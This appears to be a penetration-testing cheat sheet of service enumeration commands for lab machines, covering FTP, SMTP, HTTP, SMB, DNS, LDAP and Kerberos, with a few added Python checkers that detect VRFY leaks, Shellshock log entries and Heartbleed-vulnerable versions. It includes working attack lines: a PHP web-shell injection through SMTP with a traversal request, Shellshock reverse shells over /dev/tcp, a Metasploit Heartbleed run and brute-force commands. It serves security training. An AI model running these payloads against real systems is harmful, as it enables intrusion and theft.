# Enumeration

## Good Enumeration Guides:

{% embed url="https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/" %}

{% embed url="https://github.com/theonlykernel/enumeration/wiki" %}

{% embed url="https://book.hacktricks.xyz/" %}

## **FTP**

```bash
# Replace <target> with the host. tftp-enum is a UDP script (port 69), so run it separately with -sU -p 69.
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 <target>
```

### ncFTP

```bash
# apt install ncftp
ncftp 10.10.10.115
```

## **SSH**

**Tutorial from** [**g0tmi1k**](https://blog.g0tmi1k.com/2010/04/pwnos/)

```bash
Debian OpenSSH weak SSH keys
https://blog.g0tmi1k.com/2010/04/pwnos/
```

## **SMTP**

SMTP is a server-to-server service. Users receive or send mail through IMAP or POP3; those messages are handed to the SMTP server, which relays them to the next server. The SMTP server keeps a database of all addresses that can receive or send email, and we can use SMTP to query that database for valid email addresses. Note that SMTP cannot be used to retrieve emails, only to send them.

```bash
Commands:
HELO - Identifies the client to the server (plain SMTP greeting).
EHLO - Extended SMTP greeting; the server replies with the extensions it supports.
STARTTLS - SMTP runs over an unencrypted channel by default. Starting a TLS session encrypts the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Aborts the current mail transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Authenticates the client to the server.
VRFY - Asks the server to verify whether the given user's mailbox exists.
```

We can manually try to find out which usernames are in the database. This can be done in the following way.

```bash
nc 192.168.1.103 25

220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY roooooot
550 5.1.1 <roooooot>: Recipient address rejected: User unknown in local recipient table
```

Here we have identified the user root, while roooooot was rejected. VRFY, EXPN and RCPT can all be used to identify users. Telnet is sometimes a bit friendlier than nc, so try that too:

```bash
telnet 10.11.1.229 25
```

Using nmap to automate the enumeration of users.

```bash
nmap --script smtp-commands.nse 192.168.1.101

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
```

```bash
# Using the smtp-user-enum tool.
# -M for mode. -U for userlist. -t for target
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 192.168.1.103
```
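As an added example (not part of the original page), the Python below parses a captured VRFY session like the nc exchange above and reports whether the server's replies differ between names, which is the leak the manual probing and smtp-user-enum rely on. The transcript is constructed from the session shown; the `C:`/`S:` prefixes are an assumption of this example.

```python
import re

# Constructed transcript modelled on the nc session above; "C:" is the
# client, "S:" the server.
SAMPLE_SESSION = """\
S: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
C: VRFY root
S: 252 2.0.0 root
C: VRFY roooooot
S: 550 5.1.1 <roooooot>: Recipient address rejected: User unknown in local recipient table
C: QUIT
S: 221 2.0.0 Bye
"""

# 3-digit reply code, optional enhanced status code (x.y.z), free text.
REPLY_RE = re.compile(r"^(?P<code>\d{3})[ -](?:(?P<esc>\d\.\d+\.\d+) )?(?P<text>.*)$")


def parse_reply(line):
    """Split one SMTP reply into (code, enhanced status code or None, text)."""
    m = REPLY_RE.match(line)
    if not m:
        raise ValueError("not an SMTP reply: %r" % line)
    return int(m.group("code")), m.group("esc"), m.group("text")


def vrfy_results(transcript):
    """Map each name probed with VRFY to the reply code it received.

    250 confirms the mailbox, 252 means the server will not confirm but
    accepts mail for it (Postfix answers this for known local users) and
    550 rejects it as unknown.
    """
    results, pending = {}, None
    for raw in transcript.splitlines():
        side, _, payload = raw.partition(": ")
        if side == "C":
            verb, _, arg = payload.partition(" ")
            pending = arg.strip() if verb.upper() == "VRFY" else None
        elif side == "S" and pending is not None:
            results[pending] = parse_reply(payload)[0]
            pending = None
    return results


def leaks_user_existence(results):
    """True when replies differ between names, i.e. VRFY discloses which
    accounts exist. A server with VRFY disabled (Postfix:
    disable_vrfy_command = yes) answers every probe 502, so nothing leaks."""
    return len(set(results.values())) > 1
```

The same reply-code comparison applies to EXPN and RCPT TO probes, which leak in the same way.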

Using SMTP for log contamination. Watch the video from ippsec on [Beep](https://youtu.be/XJmBpOd__N8?t=1878)

```bash
telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
### if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
<? echo system($_REQUEST['ipp']); ?>

.
250 2.0.0 Ok: queue as 03655D92F7

Then:
GET /example/page?=../../../../../../../var/mail/asterisk%00&module=Accounts&action?ipp=ls      

```

## **HTTP**

Check the ippsec video on [Shocker](https://www.youtube.com/watch?v=IBlTdguhgfY&t=530s)

### Shellshock

```bash
# Shellshock
nmap --script http-shellshock --script-args uri=/cgi-bin -p 80 10.10.10.15

# Testing Shellshock using curl
curl -x 10.10.10.15 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 10.10.10.15:8080 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status

#Shellshock over SSH
ssh username@10.10.10.15 '() { :;}; /bin/bash'
```
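From the defender's side, the same `() {` marker used in the curl test above is what to look for in web server logs. The Python below is an added example, not code from the page: it parses Apache combined-format access-log lines (constructed here) and flags any request whose URL, referer or User-Agent carries the Shellshock trigger, percent-decoding first so an encoded copy in the query string is not missed.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access-log lines: a normal request, one
# with the Shellshock marker from the curl test above in the User-Agent, and
# one with the same marker percent-encoded in the query string.
SAMPLE_LOG = """\
10.10.14.2 - - [12/Mar/2024:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.2 - - [12/Mar/2024:10:01:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/true"
10.10.14.9 - - [12/Mar/2024:10:02:41 +0000] "GET /cgi-bin/status?x=%28%29%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Ftrue HTTP/1.1" 200 512 "-" "curl/7.88.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The trigger is a bash function definition "() {" at the start of a value;
# CGI copies request headers and the query string into environment variables,
# so any of these logged fields can carry it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_log_line(line):
    """Return the named fields of one combined-format line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shellshock_hits(log_text):
    """List (client ip, field) for every entry carrying the trigger."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue
        for field in ("request", "referer", "agent"):
            # Percent-decode first so an encoded "() {" is not missed.
            if SHELLSHOCK_RE.search(unquote(entry[field])):
                hits.append((entry["ip"], field))
    return hits
```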

### Nikto

```bash
# Nikto
nikto -h 10.10.10.10
```

### Gobuster

```bash
# Gobuster (2.x syntax; gobuster 3.x needs the dir subcommand, e.g. gobuster dir -u ...)
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

# Specifying a user agent
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

# Searching for specific extensions
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
```

### WordPress Scanner

```bash
# WPScan (newer versions take --url instead of -u)
wpscan -u 10.10.10.10/wp/
```

### WebDAV Scanner

```bash
# Davtest
davtest -url http://10.11.1.15
```

## **HTTPS**

```bash
# Heartbleed vulnerability status of different versions:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable

# Checking whether a server is vulnerable to Heartbleed
sslscan 192.168.101.1:443
# or
nmap -sV --script=ssl-heartbleed 192.168.101.8

# You can also exploit the vulnerability using Burp and Metasploit
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run
```
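The version rule in the note above, turned into a small banner check. This is an added example rather than code from the page; the banners it parses are constructed.

```python
import re

# Rule from the note above: OpenSSL 1.0.1 through 1.0.1f are affected;
# 1.0.1g and later, and the 1.0.0 and 0.9.8 branches, are not.
VERSION_RE = re.compile(r"OpenSSL[ /](?P<ver>\d+\.\d+\.\d+)(?P<patch>[a-z]*)")


def parse_openssl_version(banner):
    """Pull (major, minor, fix, patch letters) out of a banner such as an
    nmap -sV or HTTP Server header string; None if no version is disclosed."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, fix = (int(x) for x in m.group("ver").split("."))
    return major, minor, fix, m.group("patch")


def heartbleed_vulnerable(banner):
    """True for 1.0.1 .. 1.0.1f, False for any other version, None when the
    banner carries no OpenSSL version. Patch letters sort alphabetically,
    so '' (plain 1.0.1) < 'a' < ... < 'f' < 'g'."""
    parsed = parse_openssl_version(banner)
    if parsed is None:
        return None
    major, minor, fix, patch = parsed
    if (major, minor, fix) != (1, 0, 1):
        return False
    return patch <= "f"
```

Distribution packages often backport the fix while keeping the old version string, so a banner match is only a lead; confirm with the ssl-heartbleed script or sslscan above.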

## **POP3**

```bash
# To log in:
telnet 10.11.1.13 110
USER adam
PASS adam123

# To list messages:
LIST

# To retrieve a message (by its number from LIST):
RETR 1

# To exit:
QUIT
```

## **RPC**

```bash
nmap -p 111 --script=rpcinfo 10.11.1.13

rpcclient -U "" -N 10.10.10.8

rpcinfo -p 10.11.1.13

rpcclient -U username 10.11.1.13

# rpcclient commands:
srvinfo
enum
enumalsgroups
enumdomains
enumdrivers
enumkey
enumprivs
enumdata
enumdomgroups
enumforms
enumports
enumtrust
enumdataex
enumdomusers
enumjobs
enumprinter
lookupnames administrator
queryuser 500
```

## **SMB**

Enumeration and vulnerability scanning with nmap. Add your target IP address after pasting the command in your terminal.

```bash
nmap -p 139,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse

nmap -p 139,445 -vv --script vuln

nmap -p 139,445 -vv --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse

nmap -p 139,445 -vv --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery
```

### Using smbmap

```bash
smbmap -H 10.11.1.128 -u Admin -p "Password"
smbmap -H 10.11.1.13
smbmap -H 10.11.1.13 -u Doesnexist
```

### Using smbclient

```bash
smbclient -L //10.11.1.13
smbclient -L //10.11.1.13 -U John
# Quote UNC paths so the shell does not eat the backslashes
smbclient '\\10.11.1.13\Admin$' -U john
```

### Mount the smb share

```bash
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/sharename /mnt/cifs
mount -t cifs -o user=admin -o vers=1.0 //10.11.1.128/share smb
```

### Check smb file sharing

```bash
# showmount lists NFS exports (see the NFS section), not SMB shares
showmount -e 10.11.1.128
```

### crackmapexec

```bash
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
```

## **NFS**

```bash
# Enumerate exports
showmount -e 10.10.11.12

# Mounting the share
mount -t nfs 192.168.100.25:/home /tmp/infosec

# References:
# https://resources.infosecinstitute.com/exploiting-nfs-share/
# https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
```

## **SNMP**

```bash
snmpwalk -c public -v1 10.0.0.0

snmpcheck -t 192.168.1.X -c public

onesixtyone -c names -i hosts

nmap -sT -p 161 192.168.X.X -oG snmp_results.txt

snmpenum -t 192.168.1.X
```

## **MySQL**

```bash
nmap -sV -Pn -vv -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1
```

### **SQL Server**

Reference: <https://pentestlab.blog/category/exploitation-techniques/>

```bash
nmap -p1433 10.10.10.16 --script ms-sql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt
```

## **DNS**

**Important DNS records:**

```
A (address) records:  contain the IP address of the domain.
MX records:  stands for Mail Exchange, contain the mail exchange servers.
CNAME records:  used for aliasing domains. CNAME stands for Canonical Name and links a sub-domain to an existing domain DNS record.
NS records:  stands for Name Server, indicate the authoritative (or main) name server for the domain.
SOA records:  stands for Start of Authority, contain important information about the domain such as the primary name server, a timestamp showing when the domain was last updated and the party responsible for the domain.
PTR or Pointer records:  map an IP address back to a hostname. This record is also called a 'reverse record' because it connects an IP address to a hostname instead of the other way around.
TXT records:  contain text inserted by the administrator (such as notes about the way the network has been configured).
```

```bash
# Zone Transfer
dig axfr megacorp.local @10.10.10.179

# Windows:
nslookup
set type=any
ls -d blah.com

# DNS IP Lookup
dig a <domain-name-here.com> @<dns-server-here>

# MX Record Lookup
dig mx <domain-name-here.com> @<dns-server-here>

# Whois Enumeration
whois <domain-name-here>

# DNSRecon Tool
dnsrecon -d 10.11.1.13 -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml
# Zone Transfer
dnsrecon -d example.com -t axfr

# Find Active Directory using DNS
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='labs.test.com'"
```

## **Telnet**

```bash
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet  
```

## **RDP**

```bash
ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1 

# Then use rdesktop to login
rdesktop 192.168.1.10  
```

## **LDAP**

```bash
# You will get whatever object is at the base of the directory:
ldapsearch -LLL -x -h ldap.example.com -p 3389 -s base '(objectclass=*)'

# From the ippsec video on Lightweight: read the naming contexts first
ldapsearch -x -h 10.10.10.107 -s base namingContexts
# Then, using the base DN from that output:
ldapsearch -x -h 10.10.10.107 -b "dc=hackthebox,dc=htb"

# From Impacket
GetADUsers.py -all -dc-ip {ip} {domain/username}

# Nmap using the LDAP script
nmap -p 389 --script ldap-search ypuffy.htb
```

## **Kerberos**

```
# GetNPUsers.py (Impacket) does AS-REP roasting: it asks for AS-REP tickets of accounts
# that do not require Kerberos pre-authentication. Kerberoasting (service tickets for
# accounts with an SPN) is GetUserSPNs.py.
AS-REP roasting -> GetNPUsers.py
Kerberoasting   -> GetUserSPNs.py
```

Good references on Kerberos exploitation:

<https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>

<https://www.tarlogic.com/en/blog/how-to-attack-kerberos/>
